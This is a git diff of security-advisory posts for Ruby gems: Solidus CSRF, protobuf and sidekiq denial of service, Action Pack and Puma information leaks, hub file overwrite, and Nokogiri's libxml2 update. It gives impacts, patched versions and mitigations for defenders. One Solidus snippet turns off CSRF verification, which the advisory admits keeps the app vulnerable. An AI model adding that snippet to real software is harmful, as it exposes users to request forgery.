+    will cause an authentication error, as the sent token won't match with the one in
+    the session (none in this case). That's a known problem in the Rails community (see
+    https://github.com/rails/rails/issues/21948), and, at this point, there's no perfect
+    solution.
+
+    Any attempt to mitigate the issue should be seen at the application level.
+    For an excellent survey of all the available options, take a look at
+    https://github.com/betagouv/demarches-simplifiees.fr/blob/5b4f7f9ae9eaf0ac94008b62f7047e4714626cf9/doc/adr-csrf-forgery.md.
+    The latter is a third-party link. As the information is relevant here, we're going
+    to copy it below, but it should be clear that all the credit goes to @kemenaran:
+
+    > # Protecting against request forgery using CRSF tokens
+    >
+    > ## Context
+    >
+    > Rails has CSRF protection enabled by default, to protect against POST-based CSRF attacks.
+    >
+    > To protect from this, Rails stores two copies of a random token (the so-named CSRF token) on each request:
+    > - one copy embedded in each HTML page,
+    > - another copy in the user session.
+    >
+    > When performing a POST request, Rails checks that the two copies match – and
+    > otherwise denies the request. This protects against an attacker that would
+    > generate a form secretly pointing to our website: the attacker can't read
+    > the token in the session, and so can't post a form with a valid token.
+    >
+    > The problem is that, much more often, this has false positives.
+    > There are several cases for that, including:
+    >
+    > 1. The web browser (often mobile) loads a page containing a form, then is
+    > closed by the user. Later, when the browser is re-opened, it restores the
+    > page from the cache. But the session cookie has expired, and so is not
+    > restored – so the copy of the CSRF token stored in the session is missing.
+    > When the user submits the form, they get an "InvalidAuthenticityToken"
+    > exception.
+    >
+    > 2. The user attempts to fill a form, and gets an error message (usually in
+    > response to a POST request). They close the browser. When the browser is
+    > re-opened, it attempts to restore the page. On Chrome this is blocked by the
+    > browser, because the browser denies retrying a (probably non-idempotent)
+    > POST request. Safari however happily retries the POST request – but without
+    > sending any cookies (in an attempt to avoid having unexpected side-effects).
+    > So the copy of the CSRF token in the session is missing (because no cookie
+    > was sent), and the user get an "InvalidAuthenticityToken" exception.
+    >
+    > ## Options considered
+    >
+    > ### Extend the session cookie duration
+    >
+    > We can configure the session cookie to be valid for a longer time (like 2
+    > weeks).
+    >
+    > Pros:
+    > - It solves 1., because when the browser restores the page, the session
+    > cookie is still valid.
+    >
+    > Cons:
+    > - Users would be signed-in for a much longer time by default, which has
+    > unacceptable security implications.
+    > - It doesn't solve 2. (because Safari doesn't send any cookie when restoring
+    > a page from a POST request)
+    >
+    > ### Change the cache parameters
+    >
+    > We can send a HTTP cache header stating 'Cache-Control: no-store, no-cache'.
+    > This instructs the browser to never keep any copy of the page, and to always
+    > make a request to the server to restore it.
+    >
+    > This solution was attempted during a year in production, and solved 1.
+    > – but also introduced another type of InvalidAuthenticityToken errors. In
+    > that scenario, the user attempts to fill a form, and gets an error message
+    > (usually in response to a POST request). They then navigate on another domain (like
+    > France Connect), then hit the "Back" button. Crossing back the domain boundary
+    > may cause the browser to either block the request or retry an invalid POST request.
+    >
+    > Pros:
+    > - It solves 1., because on relaunch the browser requests a fresh page again
+    > (instead of serving it from its cache), thus retrieving a fresh session and
+    > a fresh matching CSRF token.
+    >
+    > Cons:
+    > - It doesn't solve 2.
+    > - It causes another type of InvalidAuthenticityToken errors.
+    >
+    > ### Using a null-session strategy
+    >
+    > We can change the default protect_from_forgery strategy to :null_session.
+    > This makes the current request use an empty session for the request duration.
+    >
+    > Pros:
+    > - It kind of solves 1., by redirecting to a "Please sign-in" page
+    > when a stale form is submitted.
+    >
+    > Cons:
+    > - The user is asked to sign-in only after filling and submitting the form,
+    > losing their time and data
+    > - The user will not be redirected to their original page after signing-in
+    > - It has potential security implications: as the (potentically malicious)
+    > request runs anyway, variables cached by a controller before the Null
+    > session is created may allow the form submission to succeed anyway
+    > (https://www.veracode.com/blog/managing-appsec/when-rails-protectfromforgery-fails)
+    >
+    > ### Using a reset-session strategy
+    >
+    > We can change the default protect_from_forgery strategy to :reset_session.
+    > This clears the user session permanently, logging them out until they log in
+    > again.
+    >
+    > Pros:
+    > - It kind of solves 1., by redirecting to a "Please sign-in" page when a
+    > stale form is submitted.
+    >
+    > Cons:
+    > - A forgery error in a browser tab will disconnect the user in all its open
+    > tabs
+    > - It has potential security implications: as the (potentically malicious)
+    > request runs anyway, variables cached by a controller before the Null session
+    > is created may allow the form submission to succeed anyway
+    > (https://www.veracode.com/blog/managing-appsec/when-rails-protectfromforgery-fails)
+    > - It allows an attacker to disconnect an user on demand, which is not only
+    > inconvenient, but also has security implication (the attacker could then log
+    > the user on it's own attacker account, pretending to be the user account)
+    >
+    > ### Redirect to login form
+    >
+    > When a forgery error occurs, we can instead redirect to the login form.
+    >
+    > Pros:
+    > - It kind of solves 1., by redirecting to a "Please sign-in" page when a
+    > stale form is submitted (but the user data is lost).
+    > - It kind of solves 2., by redirecting to a "Please sign-in" page when a
+    > previously POSTed form is reloaded.
+    >
+    > Cons:
+    > - Not all forms require authentication – so for
+    > public forms there is no point redirecting to the login form.
+    > - The user will not be redirected to their original page after signing-in
+    > (because setting the redirect path is a state-changing action, and it is
+    > dangerous to let an unauthorized request changing the state – an attacker
+    > could control the path where an user is automatically redirected to.)
+    > - The implementation is finicky, and may introduce security errors.
+    > For instance, a naive implementation that catches the exception and
+    > redirect_to the sign-in page will prevent Devise from running a cleanup code
+    > – which means the user will still be logged, and the CSRF protection is
+    > bypassed. However a well-tested implementation that lets Devise code run
+    > should avoid these pittfalls.
+    >
+    > ### Using a long-lived cookie for CSRF tokens
+    >
+    > Instead of storing the CSRF token in the session cookie (which is deleted
+    > when the browser is closed), we can instead store it in a longer-lived
+    > cookie. For this we need to patch Rails.
+    >
+    > Pros:
+    > - It solves 1., because when the user submits a stale form, even if the
+    > session cookie because stale, the long-lived CSRF cookie is still valid.
+    >
+    > Cons:
+    > - It doesn't solve 2., because when Safari retries a POST request, it sends
+    > none of the cookies (not even long-lived ones).
+    > - Patching Rails may introduce security issues (now or in the future)
+
+    #### Broken behavior due to session expiration + template cache
+
+    Although pretty unlikely, you should make sure that your current setup for
+    cache/session expiration is compatible. The upgrade can break the addition
+    of products to the cart if both:
+
+    - The "Add to cart" form is being cached (usually along with the variant
+    information).
+
+    - A user session is reset at every or every few requests.
+
+    The token validation depends on the issuing and consuming sessions
+    being the same. If a product page is cached with the token in it, it can
+    become stale on a subsequent rendering if the session changes.
+
+    To check that you're safe, after having upgraded locally, go through the
+    following steps:
+
+    - Enable cache on dev mode:
+
+    ```bash
+    bin/rails dev:cache
+    ```
+
+    - Visit the page for a variant with stock.
+
+    - Reload that page several times.
+
+    - Click on the "Add to cart"  button.
+
+    - Remember to rerun `bin/rails dev:cache` to turn off cache again.
+
+    No error or session reset should happen.
+
+    Otherwise, you can try with:
+
+    - Revisiting how your session gets expired.
+    - Changing the caching strategy to exclude the token.
+
+    #### Using weaker CSRF protection strategies
+
+    It's also important to understand that a complete fix will only be in place
+    when using the `:exception` forgery protection strategy. The
+    `solidus_frontend` engine can't do pretty much anything otherwise. Using
+    weaker CSRF strategies should be an informed and limited decision made by the
+    application team. After the upgrade:
+
+    - An app using `:null_session` should also be safe, but there will be side
+    effects. That strategy runs with a null object session. As such, no order and
+    no user is found on it. A new `cart` state order is created in the database,
+    associated with no user. Next time the user visits the site, they won't find
+    any difference in its cart state.
+
+    - An app using `:reset_session` is not entirely safe. That strategy resets the
+    session. That means that registered users will be logged out. Next time a user
+    visits, they'll see the cart with the items added during the CSRF attack,
+    although it won't be associated with their account in the case of registered
+    users.
+
+    #### Reversing the update
+
+    If you still want to deploy the upgraded version before changing your
+    application code (if the latter is needed), you can add the following
+    workaround to your `config/application.rb` (however, take into account that
+    you'll keep being vulnerable):
+
+    ```ruby
+    config.after_initialize do
+      Spree::OrdersController.skip_before_action :verify_authenticity_token, only:
+        [:populate]
+    end
+    ```
+
+    ### Workarounds
+
+    If an upgrade is not an option, you can work around the issue by adding the
+    following to `config/application.rb`:
+
+    ```ruby
+    config.after_initialize do
+      Spree::OrdersController.protect_from_forgery with: ApplicationController.forgery_protection_strategy.name.demodulize.underscore.to_sym,
+        only: [:populate]
+    end
+    ```
+
+    However, go through the same safety check detailed on "Upgrade notes" above.
+
+    ### References
+
+    - [CSRF on the Rails guides](https://guides.rubyonrails.org/security.html#cross-site-request-forgery-csrf)
+    - [How CSRF tokens are generated and validated on Rails](https://medium.com/rubyinside/a-deep-dive-into-csrf-protection-in-rails-19fa0a42c0ef)
+    - [Solidus security](https://solidus.io/security/)
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 3.1.5"
+  - "~> 3.0.5"
+  - "~> 2.11.14"
+  related:
+    url:
+    - https://github.com/solidusio/solidus/commit/4d17cacf066d9492fc04eb3a0b16084b47376d81
+    - https://github.com/solidusio/solidus/commit/a1b9bf7f24f9b8684fc4d943eacb02b1926c77c6
+---
diff --git a/advisories/_posts/2022-01-07-CVE-2021-22569.md b/advisories/_posts/2022-01-07-CVE-2021-22569.md
index 2fef55e6..c5f54816 100644
--- a/advisories/_posts/2022-01-07-CVE-2021-22569.md
+++ b/advisories/_posts/2022-01-07-CVE-2021-22569.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2021-22569 (google-protobuf): A potential Denial of Service issue in protobuf-java'
-comments: false
-categories:
-- google-protobuf
-- jruby
-advisory:
-  gem: google-protobuf
-  platform: jruby
-  cve: 2021-22569
-  ghsa: wrvw-hg22-4m67
-  url: https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67
-  title: A potential Denial of Service issue in protobuf-java
-  date: 2022-01-07
-  description: |
-    ## Summary
-
-    A potential Denial of Service issue in protobuf-java was discovered in the
-    parsing procedure for binary data.
-
-    Affected versions: All versions of Java Protobufs (including Kotlin and JRuby)
-    prior to the versions listed below. Protobuf "javalite" users (typically
-    Android) are not affected.
-
-    ## Severity
-
-    **High** - An implementation weakness in how unknown fields are parsed in
-    Java. A small (~800 KB) malicious payload can occupy the parser for several
-    minutes by creating large numbers of short-lived objects that cause frequent,
-    repeated GC pauses.
-
-    ## Proof of Concept
-
-    For reproduction details, please refer to the oss-fuzz issue that identifies
-    the specific inputs that exercise this parsing weakness.
-
-    ## Remediation and Mitigation
-
-    Please update to the latest available versions of the following packages:
-
-    - protobuf-java (3.16.1, 3.18.2, 3.19.2)
-    - protobuf-kotlin (3.18.2, 3.19.2)
-    - google-protobuf [JRuby gem only] (3.19.2)
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 3.19.2"
-  related:
-    url:
-    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330
-    - https://cloud.google.com/support/bulletins#gcp-2022-001
----
+---
+layout: advisory
+title: 'CVE-2021-22569 (google-protobuf): A potential Denial of Service issue in protobuf-java'
+comments: false
+categories:
+- google-protobuf
+- jruby
+advisory:
+  gem: google-protobuf
+  platform: jruby
+  cve: 2021-22569
+  ghsa: wrvw-hg22-4m67
+  url: https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-wrvw-hg22-4m67
+  title: A potential Denial of Service issue in protobuf-java
+  date: 2022-01-07
+  description: |
+    ## Summary
+
+    A potential Denial of Service issue in protobuf-java was discovered in the
+    parsing procedure for binary data.
+
+    Affected versions: All versions of Java Protobufs (including Kotlin and JRuby)
+    prior to the versions listed below. Protobuf "javalite" users (typically
+    Android) are not affected.
+
+    ## Severity
+
+    **High** - An implementation weakness in how unknown fields are parsed in
+    Java. A small (~800 KB) malicious payload can occupy the parser for several
+    minutes by creating large numbers of short-lived objects that cause frequent,
+    repeated GC pauses.
+
+    ## Proof of Concept
+
+    For reproduction details, please refer to the oss-fuzz issue that identifies
+    the specific inputs that exercise this parsing weakness.
+
+    ## Remediation and Mitigation
+
+    Please update to the latest available versions of the following packages:
+
+    - protobuf-java (3.16.1, 3.18.2, 3.19.2)
+    - protobuf-kotlin (3.18.2, 3.19.2)
+    - google-protobuf [JRuby gem only] (3.19.2)
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 3.19.2"
+  related:
+    url:
+    - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=39330
+    - https://cloud.google.com/support/bulletins#gcp-2022-001
+---
diff --git a/advisories/_posts/2022-01-27-CVE-2022-23837.md b/advisories/_posts/2022-01-27-CVE-2022-23837.md
index fed58808..013c6d8f 100644
--- a/advisories/_posts/2022-01-27-CVE-2022-23837.md
+++ b/advisories/_posts/2022-01-27-CVE-2022-23837.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2022-23837 (sidekiq): Denial of service in sidekiq'
-comments: false
-categories:
-- sidekiq
-advisory:
-  gem: sidekiq
-  cve: 2022-23837
-  ghsa: jrfj-98qg-qjgv
-  url: https://github.com/mperham/sidekiq/commit/7785ac1399f1b28992adb56055f6acd88fd1d956
-  title: Denial of service in sidekiq
-  date: 2022-01-27
-  description: |
-    In api.rb in Sidekiq before 5.2.10 and 6.4.0, there is no limit on the number of
-    days when requesting stats for the graph. This overloads the system, affecting the
-    Web UI, and makes it unavailable to users.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 6.4.0"
-  - "~> 5.2.10"
-  related:
-    url:
-    - https://github.com/TUTUMSPACE/exploits/blob/main/sidekiq.md
----
+---
+layout: advisory
+title: 'CVE-2022-23837 (sidekiq): Denial of service in sidekiq'
+comments: false
+categories:
+- sidekiq
+advisory:
+  gem: sidekiq
+  cve: 2022-23837
+  ghsa: jrfj-98qg-qjgv
+  url: https://github.com/mperham/sidekiq/commit/7785ac1399f1b28992adb56055f6acd88fd1d956
+  title: Denial of service in sidekiq
+  date: 2022-01-27
+  description: |
+    In api.rb in Sidekiq before 5.2.10 and 6.4.0, there is no limit on the number of
+    days when requesting stats for the graph. This overloads the system, affecting the
+    Web UI, and makes it unavailable to users.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 6.4.0"
+  - "~> 5.2.10"
+  related:
+    url:
+    - https://github.com/TUTUMSPACE/exploits/blob/main/sidekiq.md
+---
diff --git a/advisories/_posts/2022-02-09-CVE-2022-0524.md b/advisories/_posts/2022-02-09-CVE-2022-0524.md
index a56ab7cf..eb29d893 100644
--- a/advisories/_posts/2022-02-09-CVE-2022-0524.md
+++ b/advisories/_posts/2022-02-09-CVE-2022-0524.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2022-0524 (publify_core): Business Logic Errors in Publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-0524
-  ghsa: x3rq-r3cm-5vc4
-  url: https://github.com/publify/publify/commit/16fceecadbe80ab0ef846b62a12dc7bfff10b8c5
-  title: Business Logic Errors in Publify
-  date: 2022-02-09
-  description: |
-    Publify (formerly known as Typo) prior to version 9.2.7 is vulnerable
-    to business logic errors.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 9.2.7"
-  related:
-    url:
-    - https://huntr.dev/bounties/bfffae58-b3cd-4e0e-b1f2-3db387a22c3d
-    - https://github.com/publify/publify/releases/tag/v9.2.7
----
+---
+layout: advisory
+title: 'CVE-2022-0524 (publify_core): Business Logic Errors in Publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-0524
+  ghsa: x3rq-r3cm-5vc4
+  url: https://github.com/publify/publify/commit/16fceecadbe80ab0ef846b62a12dc7bfff10b8c5
+  title: Business Logic Errors in Publify
+  date: 2022-02-09
+  description: |
+    Publify (formerly known as Typo) prior to version 9.2.7 is vulnerable
+    to business logic errors.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 9.2.7"
+  related:
+    url:
+    - https://huntr.dev/bounties/bfffae58-b3cd-4e0e-b1f2-3db387a22c3d
+    - https://github.com/publify/publify/releases/tag/v9.2.7
+---
diff --git a/advisories/_posts/2022-02-11-CVE-2022-23633.md b/advisories/_posts/2022-02-11-CVE-2022-23633.md
index 1be515d2..5aeea293 100644
--- a/advisories/_posts/2022-02-11-CVE-2022-23633.md
+++ b/advisories/_posts/2022-02-11-CVE-2022-23633.md
@@ -1,70 +1,70 @@
----
-layout: advisory
-title: 'CVE-2022-23633 (actionpack): Possible exposure of information vulnerability
-  in Action Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2022-23633
-  ghsa: wh98-p28r-vrc9
-  url: https://groups.google.com/g/ruby-security-ann/c/FkTM-_7zSNA/m/K2RiMJBlBAAJ
-  title: Possible exposure of information vulnerability in Action Pack
-  date: 2022-02-11
-  description: |
-    ## Impact
-
-    Under certain circumstances response bodies will not be closed, for example a
-    bug in a webserver (https://github.com/puma/puma/pull/2812) or a bug in a Rack
-    middleware. In the event a response is not notified of a `close`,
-    `ActionDispatch::Executor` will not know to reset thread local state for the
-    next request. This can lead to data being leaked to subsequent requests,
-    especially when interacting with `ActiveSupport::CurrentAttributes`.
-
-    Upgrading to the FIXED versions of Rails will ensure mitigation if this issue
-    even in the context of a buggy webserver or middleware implementation.
-
-    ## Patches
-
-    This has been fixed in Rails 7.0.2.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2.
-
-    ## Workarounds
-
-    Upgrading is highly recommended, but to work around this problem the following
-    middleware can be used:
-
-    ```
-    class GuardedExecutor < ActionDispatch::Executor
-      def call(env)
-        ensure_completed!
-        super
-      end
-
-      private
-
-        def ensure_completed!
-          @executor.new.complete! if @executor.active?
-        end
-    end
-
-    # Ensure the guard is inserted before ActionDispatch::Executor
-    Rails.application.configure do
-      config.middleware.swap ActionDispatch::Executor, GuardedExecutor, executor
-    end
-    ```
-  cvss_v3: 7.4
-  unaffected_versions:
-  - "< 5.0.0"
-  patched_versions:
-  - "~> 5.2.6, >= 5.2.6.2"
-  - "~> 6.0.4, >= 6.0.4.6"
-  - "~> 6.1.4, >= 6.1.4.6"
-  - ">= 7.0.2.2"
-  related:
-    url:
-    - https://github.com/rails/rails/commit/10c64a472f2f19a5e485bdac7d5106a76aeb29a5
-    - https://github.com/rails/rails/blob/7-0-stable/actionpack/CHANGELOG.md#rails-7021-february-11-2022
----
+---
+layout: advisory
+title: 'CVE-2022-23633 (actionpack): Possible exposure of information vulnerability
+  in Action Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2022-23633
+  ghsa: wh98-p28r-vrc9
+  url: https://groups.google.com/g/ruby-security-ann/c/FkTM-_7zSNA/m/K2RiMJBlBAAJ
+  title: Possible exposure of information vulnerability in Action Pack
+  date: 2022-02-11
+  description: |
+    ## Impact
+
+    Under certain circumstances response bodies will not be closed, for example a
+    bug in a webserver (https://github.com/puma/puma/pull/2812) or a bug in a Rack
+    middleware. In the event a response is not notified of a `close`,
+    `ActionDispatch::Executor` will not know to reset thread local state for the
+    next request. This can lead to data being leaked to subsequent requests,
+    especially when interacting with `ActiveSupport::CurrentAttributes`.
+
+    Upgrading to the FIXED versions of Rails will ensure mitigation if this issue
+    even in the context of a buggy webserver or middleware implementation.
+
+    ## Patches
+
+    This has been fixed in Rails 7.0.2.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2.
+
+    ## Workarounds
+
+    Upgrading is highly recommended, but to work around this problem the following
+    middleware can be used:
+
+    ```
+    class GuardedExecutor < ActionDispatch::Executor
+      def call(env)
+        ensure_completed!
+        super
+      end
+
+      private
+
+        def ensure_completed!
+          @executor.new.complete! if @executor.active?
+        end
+    end
+
+    # Ensure the guard is inserted before ActionDispatch::Executor
+    Rails.application.configure do
+      config.middleware.swap ActionDispatch::Executor, GuardedExecutor, executor
+    end
+    ```
+  cvss_v3: 7.4
+  unaffected_versions:
+  - "< 5.0.0"
+  patched_versions:
+  - "~> 5.2.6, >= 5.2.6.2"
+  - "~> 6.0.4, >= 6.0.4.6"
+  - "~> 6.1.4, >= 6.1.4.6"
+  - ">= 7.0.2.2"
+  related:
+    url:
+    - https://github.com/rails/rails/commit/10c64a472f2f19a5e485bdac7d5106a76aeb29a5
+    - https://github.com/rails/rails/blob/7-0-stable/actionpack/CHANGELOG.md#rails-7021-february-11-2022
+---
diff --git a/advisories/_posts/2022-02-11-CVE-2022-23634.md b/advisories/_posts/2022-02-11-CVE-2022-23634.md
index 20ecaf0f..80da7cf8 100644
--- a/advisories/_posts/2022-02-11-CVE-2022-23634.md
+++ b/advisories/_posts/2022-02-11-CVE-2022-23634.md
@@ -1,62 +1,62 @@
----
-layout: advisory
-title: 'CVE-2022-23634 (puma): Information Exposure with Puma when used with Rails'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2022-23634
-  ghsa: rmj8-8hhh-gv5h
-  url: https://github.com/puma/puma/security/advisories/GHSA-rmj8-8hhh-gv5h
-  title: Information Exposure with Puma when used with Rails
-  date: 2022-02-11
-  description: |
-    ### Impact
-
-    Prior to `puma` version `5.6.2`, `puma` may not always call
-    `close` on the response body. Rails, prior to version `7.0.2.2`, depended on the
-    response body being closed in order for its `CurrentAttributes` implementation to
-    work correctly.
-
-    From Rails:
-
-    > Under certain circumstances response bodies will not be closed, for example
-    > a bug in a webserver[1] or a bug in a Rack middleware. In the event a
-    > response is not notified of a close, ActionDispatch::Executor will not know
-    > to reset thread local state for the next request. This can lead to data
-    > being leaked to subsequent requests, especially when interacting with
-    > ActiveSupport::CurrentAttributes.
-
-    The combination of these two behaviors (Puma not closing the body + Rails'
-    Executor implementation) causes information leakage.
-
-    ### Patches
-
-    This problem is fixed in Puma versions 5.6.2 and 4.3.11.
-
-    This problem is fixed in Rails versions 7.02.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2.
-
-    See: https://github.com/advisories/GHSA-wh98-p28r-vrc9
-    for details about the rails vulnerability
-
-    Upgrading to a patched Rails _or_ Puma version fixes the vulnerability.
-
-    ### Workarounds
-
-    Upgrade to Rails versions 7.0.2.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2.
-
-    The [Rails CVE](https://groups.google.com/g/ruby-security-ann/c/FkTM-_7zSNA/m/K2RiMJBlBAAJ?utm_medium=email&utm_source=footer&pli=1)
-    includes a middleware that can be used instead.
-  cvss_v3: 8.0
-  patched_versions:
-  - "~> 4.3.11"
-  - ">= 5.6.2"
-  related:
-    cve:
-    - 2022-23633
-    ghsa:
-    - wh98-p28r-vrc9
-    url:
-    - https://github.com/puma/puma/commit/b70f451fe8abc0cff192c065d549778452e155bb
----
+---
+layout: advisory
+title: 'CVE-2022-23634 (puma): Information Exposure with Puma when used with Rails'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2022-23634
+  ghsa: rmj8-8hhh-gv5h
+  url: https://github.com/puma/puma/security/advisories/GHSA-rmj8-8hhh-gv5h
+  title: Information Exposure with Puma when used with Rails
+  date: 2022-02-11
+  description: |
+    ### Impact
+
+    Prior to `puma` version `5.6.2`, `puma` may not always call
+    `close` on the response body. Rails, prior to version `7.0.2.2`, depended on the
+    response body being closed in order for its `CurrentAttributes` implementation to
+    work correctly.
+
+    From Rails:
+
+    > Under certain circumstances response bodies will not be closed, for example
+    > a bug in a webserver[1] or a bug in a Rack middleware. In the event a
+    > response is not notified of a close, ActionDispatch::Executor will not know
+    > to reset thread local state for the next request. This can lead to data
+    > being leaked to subsequent requests, especially when interacting with
+    > ActiveSupport::CurrentAttributes.
+
+    The combination of these two behaviors (Puma not closing the body + Rails'
+    Executor implementation) causes information leakage.
+
+    ### Patches
+
+    This problem is fixed in Puma versions 5.6.2 and 4.3.11.
+
+    This problem is fixed in Rails versions 7.02.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2.
+
+    See: https://github.com/advisories/GHSA-wh98-p28r-vrc9
+    for details about the rails vulnerability
+
+    Upgrading to a patched Rails _or_ Puma version fixes the vulnerability.
+
+    ### Workarounds
+
+    Upgrade to Rails versions 7.0.2.2, 6.1.4.6, 6.0.4.6, and 5.2.6.2.
+
+    The [Rails CVE](https://groups.google.com/g/ruby-security-ann/c/FkTM-_7zSNA/m/K2RiMJBlBAAJ?utm_medium=email&utm_source=footer&pli=1)
+    includes a middleware that can be used instead.
+  cvss_v3: 8.0
+  patched_versions:
+  - "~> 4.3.11"
+  - ">= 5.6.2"
+  related:
+    cve:
+    - 2022-23633
+    ghsa:
+    - wh98-p28r-vrc9
+    url:
+    - https://github.com/puma/puma/commit/b70f451fe8abc0cff192c065d549778452e155bb
+---
diff --git a/advisories/_posts/2022-02-15-CVE-2014-0177.md b/advisories/_posts/2022-02-15-CVE-2014-0177.md
index 779b9ef5..ebb57bb9 100644
--- a/advisories/_posts/2022-02-15-CVE-2014-0177.md
+++ b/advisories/_posts/2022-02-15-CVE-2014-0177.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2014-0177 (hub): Hub Package Arbitrary File Overwrite'
-comments: false
-categories:
-- hub
-advisory:
-  gem: hub
-  cve: 2014-0177
-  ghsa: x5m6-jh4r-34mv
-  url: https://github.com/mislav/hub/releases/tag/v1.12.1
-  title: Hub Package Arbitrary File Overwrite
-  date: 2022-02-15
-  description: |
-    The am function in lib/hub/commands.rb in hub before 1.12.1 allows
-    local users to overwrite arbitrary files via a symlink attack
-    on a temporary patch file.
-  cvss_v2: 3.6
-  cvss_v3: 4.4
-  patched_versions:
-  - ">= 1.12.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2014-0177
-    - https://github.com/mislav/hub/releases/tag/v1.12.1
-    - https://www.suse.com/zh-cn/security/cve/CVE-2014-0177.html
-    - https://github.com/github/hub/commit/016ec99d25b1cb83cb4367e541177aa431beb600
-    - https://github.com/advisories/GHSA-x5m6-jh4r-34mv
----
+---
+layout: advisory
+title: 'CVE-2014-0177 (hub): Hub Package Arbitrary File Overwrite'
+comments: false
+categories:
+- hub
+advisory:
+  gem: hub
+  cve: 2014-0177
+  ghsa: x5m6-jh4r-34mv
+  url: https://github.com/mislav/hub/releases/tag/v1.12.1
+  title: Hub Package Arbitrary File Overwrite
+  date: 2022-02-15
+  description: |
+    The am function in lib/hub/commands.rb in hub before 1.12.1 allows
+    local users to overwrite arbitrary files via a symlink attack
+    on a temporary patch file.
+  cvss_v2: 3.6
+  cvss_v3: 4.4
+  patched_versions:
+  - ">= 1.12.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-0177
+    - https://github.com/mislav/hub/releases/tag/v1.12.1
+    - https://www.suse.com/zh-cn/security/cve/CVE-2014-0177.html
+    - https://github.com/github/hub/commit/016ec99d25b1cb83cb4367e541177aa431beb600
+    - https://github.com/advisories/GHSA-x5m6-jh4r-34mv
+---
diff --git a/advisories/_posts/2022-02-21-CVE-2021-30560.md b/advisories/_posts/2022-02-21-CVE-2021-30560.md
index 5a73781b..9a43d081 100644
--- a/advisories/_posts/2022-02-21-CVE-2021-30560.md
+++ b/advisories/_posts/2022-02-21-CVE-2021-30560.md
@@ -1,89 +1,89 @@
----
-layout: advisory
-title: 'CVE-2021-30560 (nokogiri): Update packaged libxml2 (2.9.12 → 2.9.13) and libxslt
-  (1.1.34 → 1.1.35)'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2021-30560
-  ghsa: fq42-c5rg-92c2
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-fq42-c5rg-92c2
-  date: 2022-02-21
-  title: Update packaged libxml2 (2.9.12 → 2.9.13) and libxslt (1.1.34 → 1.1.35)
-  description: |
-    ## Summary
-
-    Nokogiri v1.13.2 upgrades two of its packaged dependencies:
-
-    * vendored libxml2 from v2.9.12 to v2.9.13
-    * vendored libxslt from v1.1.34 to v1.1.35
-
-    Those library versions address the following upstream CVEs:
-
-    * libxslt: CVE-2021-30560 (CVSS 8.8, High severity)
-    * libxml2: CVE-2022-23308 (Unspecified severity, see more information below)
-
-    Those library versions also address numerous other issues including performance
-    improvements, regression fixes, and bug fixes, as well as memory leaks and other
-    use-after-free issues that were not assigned CVEs.
-
-    Please note that this advisory only applies to the CRuby implementation of
-    Nokogiri < 1.13.2, and only if the packaged libraries are being used. If you've
-    overridden defaults at installation time to use system libraries instead of
-    packaged libraries, you should instead pay attention to your distro's `libxml2`
-    and `libxslt` release announcements.
-
-    ## Mitigation
-
-    Upgrade to Nokogiri >= 1.13.2.
-
-    Users who are unable to upgrade Nokogiri may also choose a more complicated
-    mitigation: compile and link an older version Nokogiri against external libraries
-    libxml2 >= 2.9.13 and libxslt >= 1.1.35, which will also address these same CVEs.
-
-    ## Impact
-
-    * libxslt CVE-2021-30560
-    * CVSS3 score: 8.8 (High)
-
-    Fixed by https://gitlab.gnome.org/GNOME/libxslt/-/commit/50f9c9c
-
-    All versions of libxslt prior to v1.1.35 are affected.
-
-    Applications using untrusted XSL stylesheets to transform XML are vulnerable to
-    a denial-of-service attack and should be upgraded immediately.
-
-    libxml2 CVE-2022-23308
-    * As of the time this security advisory was published, there is no officially
-    published information available about this CVE's severity. The above NIST link
-    does not yet have a published record, and the libxml2 maintainer has declined
-    to provide a severity score.
-    * Fixed by https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12
-    * Further explanation is at https://mail.gnome.org/archives/xml/2022-February/msg00015.html
-
-    The upstream commit and the explanation linked above indicate that an application
-    may be vulnerable to a denial of service, memory disclosure, or code execution if
-    it parses an untrusted document with parse options `DTDVALID` set to true, and `NOENT`
-    set to false.
-
-    An analysis of these parse options:
-
-    * While `NOENT` is off by default for Document, DocumentFragment, Reader, and
-    Schema parsing, it is on by default for XSLT (stylesheet) parsing in Nokogiri
-    v1.12.0 and later.
-    * `DTDVALID` is an option that Nokogiri does not set for any operations, and so
-    this CVE applies only to applications setting this option explicitly.
-
-    It seems reasonable to assume that any application explicitly setting the parse
-    option `DTDVALID` when parsing untrusted documents is vulnerable and should be
-    upgraded immediately.
-  cvss_v3: 8.8
-  patched_versions:
-  - ">= 1.13.2"
-  related:
-    cve:
-    - 2021-30560
-    - 2022-23308
----
